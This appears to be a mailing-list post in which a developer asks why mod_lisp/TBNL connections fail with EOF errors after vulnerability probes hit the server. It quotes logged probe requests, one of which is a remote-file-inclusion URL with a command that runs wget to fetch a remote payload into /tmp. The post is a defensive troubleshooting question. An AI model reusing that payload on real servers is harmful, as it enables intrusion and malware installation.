Every now and then I get hit by a sudden probe of various web script vulnerabilities. The requests look like this:
POST /xmlrpc/xmlrpc.php POST /blogs/xmlsrv/xmlrpc.php GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;c...
After these things happen, the connection between mod_lisp and tbnl starts to fail with this message in the apache logs:
[Wed Apr 05 08:19:50 2006] [error] (70014)End of file found: error reading from Lisp [Wed Apr 05 08:19:51 2006] [error] (70014)End of file found: error reading from Lisp
Making requests to the website results in a 500 Internal Server Error.
I have looked at the listener object when this happens, and it seems to have 10 workers. After a few more requests (all 500 errors), the worker count drops down, and then suddenly things start working normally again.
What might be happening with the connection in this situation? Is there anything in the listener object I can inspect to discover why the mod_lisp connection is getting EOF?
Zach